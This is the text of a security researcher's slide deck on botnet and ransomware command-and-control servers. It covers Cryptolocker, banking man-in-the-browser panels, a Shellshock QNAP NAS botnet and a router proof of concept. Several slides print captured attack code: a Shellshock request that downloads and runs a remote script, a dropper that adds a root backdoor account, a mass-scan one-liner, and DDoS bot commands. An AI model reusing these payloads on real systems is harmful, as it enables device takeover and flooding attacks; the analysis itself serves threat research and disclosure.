The document discusses the inner workings of several cybercriminal operations and malware campaigns. It reveals details about the Cryptolocker ransomware command and control server infrastructure, including how it targeted victims and stored encrypted files. It also analyzes unique man-in-the-browser malware used to target online banking and a botnet that compromised QNAP network attached storage devices to potentially launch distributed denial of service attacks.

1. Senad Aruc
senad.aruc@gmail.com
www.senadaruc.com
Famous C&C servers from
inside to outside.
CSE - Advanced Threats Group @ Cisco

2. Introduction

3. Senad Aruc
• Born in Macedonia
• Survived 3 wars 
• first computer Commodore-64
• first hack was free internet in 1998 using PBX call divert after 3 rings 
• first public hack was first iPhone using Sim-Clone method Aug.2007
• more than 20 botnet researches and dozen of hacks all reported and published
• hold analyst roles, then principal consultant roles focusing on SOC’s, then I build some
SOC’s and MSSP’s and now I am working for ATS team at Cisco responsible for Northern
Europe
• last hack Vodafone-Netherlands "DrayTek Vigor2132FVn” RCE vulnerability
• is this my last hack? Off course not, I am just starting  we are just starting!

4. I like to thanks to my wife and my two kids for their support. Because all of this requires a
lot of work, so I am always stealing from their time . Also I like to thanks to my friend
Davide Cioccia.
Family and friend first

5. Agenda
Revealed Botnet’s Takeaway
• Why do we still suck at malware infections
• Inside Cryptolocker C&C server
• Revealing Unique MitB Builder C&C
Server
• NAS Botnet Revealed
Inside Cryptolocker C&C server
• Kins origin malware acting like a Real E-
banking web app
• Other research articles
• Understand how the Bot-nets works
• Vodafone-Netherlands "DrayTek
Vigor2132FVn” Hack-POC details
• Knowledge sharing

6. Why defense in-depth is BROKEN!
Current defense in-
depth approach
is built on binary
detection
Single points of inspection have their limitations
Known threats are blocked
Good files make
it through
NGIPS EndpointWSAESA ISRNGFW
Unknown threats are
passed to the next system
?
?





?
?
?
?
?
?

7. Malware on wire is not a malware!
Malware on the wire Malware on the endpoint
or

8. Revealed Botnet’s

9. • Inside Cryptolocker C&C server
“CryptoLocker was a ransomware trojan which targeted computers
running Microsoft Windows and was first observed by Dell
SecureWorks in September 2013. CryptoLocker propagated via
infected email attachments, and via an existing botnet; when activated,
the malware encrypts certain types of files stored on local and
mounted network drives using RSA public-key cryptography, with the
private key stored only on the malware's control servers. The malware
then displays a message, which offers to decrypt the data if a payment
(through either Bitcoin or a pre-paid cash voucher) is made by a stated
deadline, and threatened to delete the private key if the deadline
passes. If the deadline is not met, the malware offered to decrypt data
via an online service provided by the malware's operators, for a
significantly higher price in Bitcoin”(Wikipedia)

10. • Infection Process
The CryptoLocker infection process start
when the Microsoft Office Word is opened.
Microsoft allow users to inject a macro
scripting code inside documents, and give
the possibility to execute it automatically
when the document is opened.
“A macro is a series of commands and
actions that help to automate some tasks -
effectively a program but usually quite short
and simple. However they are created, they
need to be executed by some system which
interprets the stored commands”
(Wikipedia)
Analyzing the documents we received through a suspicious
mail we extract the macro inside. The macro used by
hackers to infect the machine is a Visual Basic module that
is able to create new files inside the TEMP folder and
download the real malware from a C&C server through an
HTTP GET request. To avoid antivirus detection the
malware is represented by a .PNG image containing a VB
code inside.

11. Here is a sample took from the original macro that show how the malware can communicate with his C&C server and how
the code is obfuscated.
1. xwrr5e2ngn3ofo65cnfwctqt7rvvyxzu0gbdg47u8h3zgt9hcb Chr(104) & Chr(116) & Chr(116) & Chr(1xx) & Chr(x8)
& Chr(4x) & Chr(47) & Chr(49) & Chr(48) & Chr(57) & Chr(46) & Chr(xx) & Chr(xx) & Chr(xx) & Chr(4x) & Chr(49)
& Chr(xx) & Chr(xx) & Chr(46) & Chr(xx) & Chr(57) & Chr(xx) & Chr(9x) & Chr(x) & Chr(xx) & Chr(110) & Chr(103)
, Environ(Chr(1xx) & Chr(1xx) & Chr(1xx) & Chr(112)) & Chr(92) & Chr(74) & Chr(75) & Chr(87) & Chr(84) & Chr(8
9) & Chr(65) & Chr(68) & Chr(88) & Chr(74) & Chr(85) & Chr(77) & Chr(46) & Chr(101) & Chr(xx0) & Chr(xx1)
Many characters are obfuscated (xx) on purpose. The macro we found inside is a VB macro with many functions to hook the
malware and download the real .exe from another server.
The algorithm used by the malicious encryption is ordinary and the process injections are as follows:
 WINWORD.exe
o JKWTYADXJUM.exe
 JKWTYADXJUM.exe
 explorer.exe
o vssadmin.exe
o iexplorer.exe
 svchost.exe
Fig 2 – Injected process
After the dropper executes the malware the system is encrypting the personal files with public PGP key and storing the
private key in the CC server with time bomb.

12. • Inside the C&C server
Templates used to build the cryptolocker webpage Single template pages
The functionality of the CC server is designed to operate in autopilot.
There is a two main functionality, one for the victim “user” and for the admin “admin”.

13. • Inside the C&C server
The admin can configure the CryptoLocker and the settings of the C&C server with the infection kind and amount of
money they will request from the victims.
The attackers can define an INDEX landing page for the specific counties with the amount of the ransom where they
can define the before and after amount.
Control panel to upload a new temaplate

14. • Inside the C&C server
The configuration page for the attacker where he can define the contact e-mail and tor-url for the communications
between the victim and the attacker. Also we can see here the payment URL – Bit-coin wallet setups. The most
important option here is the decryption key and application that C&C will deliver to the victim after the payment.
Admin control panel to set the Bitcoin ID to receive the payments

15. • Inside the C&C server
Infected victims are inside the folders BOTS where the system is creating a new folder after every new spread
phishing attack.
Admin control panel to set the Bitcoin ID to receive the payments
Every single Botnet contains different folders:
 mails: targeted account from
different countries
 smtp: stolen account used to spread the
phishing campaign
 errs: errors generated by the
Cryptolocker
Botnets used by Cryptolocker

16. • Inside the C&C server
The BOTNET number 11 contains 2.172 infected victims hostnames.
Admin control panel to set the Bitcoin ID to receive the payments

17. • Inside the C&C server
The mails folder contains “CSV” files with email addresses used in the spread spam attack.
Admin control panel to set the Bitcoin ID to receive the payments
File “GB.csv” contains 12.904 mail addresses
with full name and surname of the targeted
victims. Below an extract of the data inside every
single file.
The total amount of the targeted victims inside the BOTNET11:
• ES.csv = 2580
• GB.csv = 12.904
• IT.csv = 9.689
• NL.csv = 1.809
TOTAL = 26.982
Mail section

18. • Inside the C&C server
A lot of the victims didn’t receive the promised unlock keys, so this is a proof that is not good to pay them a money
because they will never ever provide you the keys for unlock.

19. • Revealing Unique MitB Builder C&C Server
Man in the Browser Attack
We all know how easy is to go underground and to buy a
malware-as-a-service kits for trojans, ransomwares, d-
dos bots etc. But what about a service for Man in the
Browser attacks for well-known electronic banking web
application’s and also to order a custom one. These
injectors are main weapon used from bad guys for the
electronic banking application where 2-factor
authentication “Tokens” is implemented.

20. The malware sample that we had an exclusive right to analyse is targeting a large finance institution located in EU. The
attack is targeted attack with three main components.
 Malware “KINS”
o Version: 2.0
o First seen: 14.02.2015
o MD5: babc53295da4cd953a1cae1e33de4910
 C&C “Zeus”
o Configuration: hxxx://hidden.ru:80/1/uggi/binari/hy78.jpg  Config
o Drop-Zone: hxxx://hidden.ru:80/1/uggi/gate.php  Gate
o Binary: hxxx://hidden.ru:80/1/uggi/binari/bot.exe  Malware
 MitB C&C “Blocks”
o Base64 encoded: aHR0cHM6Ly9hiddencnkuY29tLhiddenaHA=
o Base64 decoded: hxxs://hidden.com:443/s/g.php  Gate
o hxxx://hidden.com:443/s/manual.php  Russian Manual for Blocks
o hxxx://hidden.com:443/s/center.php  C&C Server for Blocks MitB
• IOC details

21. • Inside Mitb C&C blocks
This unique MitB builder is design to help
even an unexperienced Hacker to build a
MitB attacks just by adding and configuring
blocks for every single function and step.
Using this method the hacker can interact
with the victim’s action in hidden way
pushing injected commands inside the
browser and hiding them by manipulating
CSS and Java scripts.
C&C Blocks MitB Server Login Page

22. MitB Server Welcome Page
1. In this section we can see
the attack campaign details
for each bank.
2. The second section is for
online victims-bots
3. The last section is for offline
victims-bots

23. MitB Group Builder
The edit function located
into first section is for
building a MitB for the
victims of that specific
bank-group. Here we
can see the blocks for
building the perfect MitB
attack.

24. Drop-Down List Commands
The command list for every block is described in this dropdown list.
 Go – Is allowing the victim to reach the e-banking web
application
 Question – Building a custom questionaries’ for the victims
 Error Question – Asking a questing with error output
 Tan – Java-Script function
 Error Tan - Java-Script function
 Hold – This is the function when victim click the button for
transaction.
 Error Login – To trick victim that the login details are not
correct.
 Kick – to kick the victim from e-banking application
 Confirm – Building a fake confirm messages
 Page – To forward the victim on different page.

25. Specific Injections per Victim
Another function of this MitB builder
is custom injections for every single
victim-bot. Here we can see the
inject functions that attacker can
build for a specific victim-bot.
The username and the OTP
password for every single command
can be seen from the info marked in
red box.
The attackers can configure the
following inject functions.
• Button Text
• Command
• Parameter 1
• Parameter 3
• Style

26. List of the victims
The attack is alive and the
amount of the new victims is 5-
10 per day.

27. • Armed Qnap-NAS Botnet Revealed
The attackers are sending a GET request with Shellshock exploit to all
IP ranges around the Internet. The successfully hacked NAS devices
are forced to download a payload from Internet, this payload contains
a SH script with very clever design logic specially build for QNAP NAS
devices. The payload downloads the ELF Linux installer package with
BOT functionality for DDOS. From this point the attacker is building
persistence with autorun.sh script inside the compromised NAS
device.

28. Another interesting founding is that attacker is patching the vulnerable
device against the Shellshock vulnerability; by doing this attacker
prevents other hackers to own the already hacked NAS device.
Adding a “'request” user with root privileges into the “passwd” and
“shadow” file is classical approach to own a Linux machine. The real aim
of this massive hack is, at the script “armgH.cgi” that attacker is
downloading and installing into the compromised machine.
• This CGI Backdoor prepares the NAS to become an armed device
ready for DDOS.
• The whole attack schematic is design to be continuous with auto pilot
mode.
• So far we managed to detect more than 500+ compromised devices.
Massive
ShellShock
vulnerability
Attack
Deploy the
payload
Pathcing
against
ShellShock
Arming the
NAS for
DDOS
attacks
Deploy the
scanner for
ShellShock
Attack
 Massive Attack  Deploying Payload Patching against Shellshock (persistence)  Arming  Deploy the scanner 

29. GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
User-Agent: () { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget -c
http://xxx.14.xx.xx/S0.sh -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1
500HTTP/1.1 404 Not Found
Content-Type: text/html;charset=utf-8
Content-Length: 2250
Date: Sat, 13 Dec 2014 22:09:42 GMT
Server: header">HTTP Status 404 - /cgi-bin/authLogin.cgi
Attack Exploit detected from our IDS devices.

30. Payload - Hosted in compromise server!
#!/bin/sh export PATH=/opt/sbin:/opt/bin:/usr/local/bin:/bin:/usr/bin:/usr/sbin:/mnt/ext/usr/bin:/mnt/ext/usr/local/bin unset HISTFIE ;
unset REMOTEHOST ; unset SHISTORY ; unset BASHISTORY os=`uname -m` ip=xxx.14.xx.xx #wget -P /tmp/
http://qupn.byethost5.com/gH/S0.sh ; cd /tmp/ ; chmod +x S0.sh ; sh S0.sh # # fold=/share/MD0_DATA/optware/.xpl/ if [[ "$os" ==
'armv5tel' ]]; then
wget -c -P /share/MD0_DATA/optware/.xpl/ http://$ip/armgH.cgi
chmod 4755 /home/httpd/cgi-bin/armgH.cgi mv /home/httpd/cgi-bin/armgH.cgi /home/httpd/cgi-bin/exo.cgi cp /home/httpd/cgi-
bin/exo.cgi ${fold}.exo.cgi sleep 1
Search="request"
Files="/etc/passwd" if grep $Search $Files; then echo "$Search user its just added!"
else echo "request:x:0:0:request:/share/homes/admin:/bin/sh" >> /etc/passwd
echo 'request:$1$$PpwZ.r22sL5YrJ1ZQr58x0:15166:0:99999:7:::' >> /etc/shadow
#inst patch
wget -P /mnt/HDA_ROOT/update_pkg/ http://eu1.qnap.com/Storage/Qfix/ShellshockFix_1.0.2_20141008_all.bin
#inst scan
sfolder="/share/HDB_DATA/.../" url69="http://xxx.14.xx.79/run"

31. Payload - Hosted Arming the NAS devices for DDOS attacks.
Hosted in compromise server “armgH.cgi -ELF Linux backdoor with IRC client and DDOS capability.
Output from - Reverse engineering analyses.
PRIVMSG %s :* .exec <commands> - execute a system command
PRIVMSG %s :* .version - show the current version of bot
PRIVMSG %s :* .status - show the status of bot
PRIVMSG %s :* .help - show this help message
PRIVMSG %s :* *** Scan Commands
PRIVMSG %s :* .advscan <a> <b> <user> <passwd> - scan with user:pass (A.B) classes sets by
you
PRIVMSG %s :* .advscan <a> <b> - scan with d-link config reset bug
PRIVMSG %s :* .advscan->recursive <user> <pass> - scan local ip range with user:pass, (C.D)
classes random
PRIVMSG %s :* .advscan->recursive - scan local ip range with d-link config reset bug
PRIVMSG %s :* .advscan->random <user> <pass> - scan random ip range with user:pass, (A.B)
classes random
PRIVMSG %s :* .advscan->random - scan random ip range with d-link config reset bug
PRIVMSG %s :* .advscan->random->b <user> <pass> - scan local ip range with user:pass, A.(B)
class random
PRIVMSG %s :* .advscan->random->b - scan local ip range with d-link config reset bug
PRIVMSG %s :* .stop - stop current operation (scan/dos)
PRIVMSG %s :* *** DDos Commands:
PRIVMSG %s :* NOTE: <port> to 0 = random ports, <ip> to 0 = random spoofing,
PRIVMSG %s :* use .*flood->[m,a,p,s,x] for selected ddos, example: .ngackflood->s host port secs
PRIVMSG %s :* where: *=syn,ngsyn,ack,ngack m=mipsel a=arm p=ppc s=superh x=x86
PRIVMSG %s :* .spoof <ip> - set the source address ip spoof
PRIVMSG %s :* .synflood <host> <port> <secs> - tcp syn flooder
PRIVMSG %s :* .ngsynflood <host> <port> <secs> - tcp ngsyn flooder (new generation)
PRIVMSG %s :* .ackflood <host> <port> <secs> - tcp ack flooder
PRIVMSG %s :* .ngackflood <host> <port> <secs> - tcp ngack flooder (new generation)
PRIVMSG %s :* *** IRC Commands:
PRIVMSG %s :* .setchan <channel> - set new master channel
PRIVMSG %s :* .join <channel> <password> - join bot in selected room
PRIVMSG %s :* .part <channel> - part bot from selected room
PRIVMSG %s :* .quit - kill the current process

32. Screenshot from hacked NAS device with
deployed payload can be controlled via CGI
web backdoor
http://X.X.X.X:8080/cgi-bin/exo.cgi
Mass scanner for Shellshock
This script is taken from a compromised NAS device.
Attacker is using “pscan” multi threaded port scanner to
search and hack for other vulnerable Qnap NAS devices.
#!/bin/sh
## xXx@code 3-12-2014
rand=`echo $((RANDOM%255+2))`
#url="" url="http://1xx.xx.xx.xx/S0.sh" download="/bin/rm -rf
/tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php &&
/usr/bin/wget -c $url -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1
nnn"
get="GET /cgi-bin/authLogin.cgi HTTP/1.1nHost:
127.0.0.1nUser-Agent: () { :; }; $download nnn" ./pnscan -
rQDoc -w"$get "-t500 -n300 $rand.0.0.0:255.0.0.0 8080 >
/dev/null &

33. • Kins origin malware acting like a Real E-banking web app
Uncovering a C&C server used by hackers to control the infected
victims. The malware analyses done on victim’s machines reveals that
malware from KINS family is targeting specific Italian bank users with
ATSEngine, with capability to dynamic inject a code in the victims
browser and managing the “drops” in full automatic way.

34. • IOC
malware_family "KINS"
malware_family_version "1.0.0.5"
first_seen_timestamp "2014-05-30 15:15:01"
decrypted_config_size "20708"
decrypted_config_md5 "35bf382ea8e1e711c3d548bcfcfc54af"
encrypted_config_md5 "305edd5731692c828290705c5da279a1"
Entry RelatedBinaries "843046eb1404a49910ab433424d64c6b"
First sample details
malware_family "KINS"
malware_family_version "1.0.0.5"
first_seen_timestamp " 2014-05-23 15:15:01"
decrypted_config_size " 20534"
decrypted_config_md5 " 0403cf8dd20db5edd762f1089df1c1ba"
encrypted_config_md5 " 181d3daf422ab2ca76edefe3a4805403"
Entry RelatedBinaries " 8ffe59bc277556ef8b63bf8319bd4c78"
Second sample details
entry "Dropzone" "https://37.XX.XX.XX/css/css.php"
entry "Binary" "https://37.XX.XX.XX/css/upd.exe”
Drop-Zone details
entry"Webinject" target "https://www.xxx.xx/xxxx/*"
Web-Inject details
varbname='%BOTID%';"https://XXX.com/XXX.php?q=2">
C&C-Server details

35. • C&C CENTER FUNCTION DETAILS
Behind the front-end which
was password protected we
saw a slight different version
of ATSEngine with capability
to automate the way of
“drops” money transfer from
the hacked victims.
 The first page is Accounts where we can see the status of the victims “bots” with their money balance. The
statistics at right shows us the grabbed data, transferred money and logs. Also we have the tab for IP
addresses, login ID’s and BOT ID’s of the victims.

36.  The second is the DROPS page, where attacker define the “drops” the bank account
where the stolen money going to be transferred. Here we can see the tabs for; Drop Name,
City, County, IBAN and memo about the transaction. The system is automatically
calculates the profit percentage for the person who is receiving the stolen money.

37.  At the Reports page we can see the
logs received from the victims. This
shows us that the Man-in the middle
browser attack is designed for
Microsoft Internet Explorer version 8
and 11. Also here the attacker can
tract the error logs with “View HTML
Content” if the attack was
unsuccessful. Also here we can see
the targeted bank details.

38.  At the Transfers page we can see the successful “drops”
transvers made by attackers. Here we can see that they
stole and transfer 1750.euro to defined IBAN account.
 Here we can see the “Add Drop” form
where attackers can define a new
“drop” with all requested details;
Memo, IBAN, Name, Country, City,
Transfer Memo, Percent of Amount,
Min-Max Balance Limit, Min-Max
Transfer Limit.

39.  Add Transfers is the killer option of this version of ATSEngine, here we can create a
“TASK” that will be executed in the victims machine in totally hidden way by
transferring the money to the predefined “Drop” account. Here we can select the victim
from the list and define the date and time when the transfer will occur, with the amount
of money that malware will steal from the victim.

40. Other research articles.
• Revealing Unique MitB Builder C&C Server - Awareness publication
• NAS Botnet Revealed - Bluekaizen magazine
• Inside Cryptolocker C&C server – eForensics magazine
• Are 2 factor authentications enough to protect your money? – eForensics magazine
• Kins origin malware acting like a Real E-banking web app– Awareness publication
• Infostealer Botnet Reveal – Awareness publication
• State of ART Phishing Attack stealing 50K Credit Cards Reveal –Awareness publication
• One shot eight banks – Awareness publication
• Target List of Hesper-BOT Malware – Awareness publication
• Password cracking: proving your login. Password Cracking - Hakin9 magazine
• Time to alert Spar Kasse Bank Macedonia - Awareness disclosure
• Simple hack into web server of Customs of MK- Awareness disclosure
• Information security awareness at RM- Awareness disclosure
• I discovered a new way of Sim Carrier unlock
• Web Site Count 126 can be HACKED - Awareness disclosure
Full PDF version of my research publications: http://goo.gl/MHzIvC

41. Vodafone-Netherlands "DrayTek
Vigor2132FVn” Hack POC details

42. Story…
DrayTek Vigor2132FVn
NAT
with
Fiber Optic Internet
Cisco Meraki MX64 with AMP+TG
Bridge
Vigor2132FVn with Active True IP
Vodafone Forum discussions
about the Active True IP and
how they disabled because of the
security 
Hmmm lets play with this router.

43. iAlsIdx0=0&iDmzEn0=1&sDmzHst0=192.168.1.26&sDMZTpye=2&DMZHostMA
C0=7C&DMZHostMAC1=01&DMZHostMAC2=91&DMZHostMAC3=53&DMZHos
tMAC4=A5&DMZHostMAC5=01&fid=2&iAct=1&iInetWanIdx=1&iPageIdx=1&isTr
ueIpDmz=1&sFormAuthStr=cbACrZnAFnZ8Zc6
MAC address of the router
7C:01:91:53:A5:01
=1 is True IP enabled 
POST

44. Here we can see the scrip
responsible for the
configuration changes
Here is the Bridge Mode 
Just delete the “display:none”

45. From disabled change to enabled
Finally click Ok and reboot 

46. Disclosure. Greetings from Vodafone.

47. Thanks.
This will work in all Vodafone DrayTek firmware's until 2016.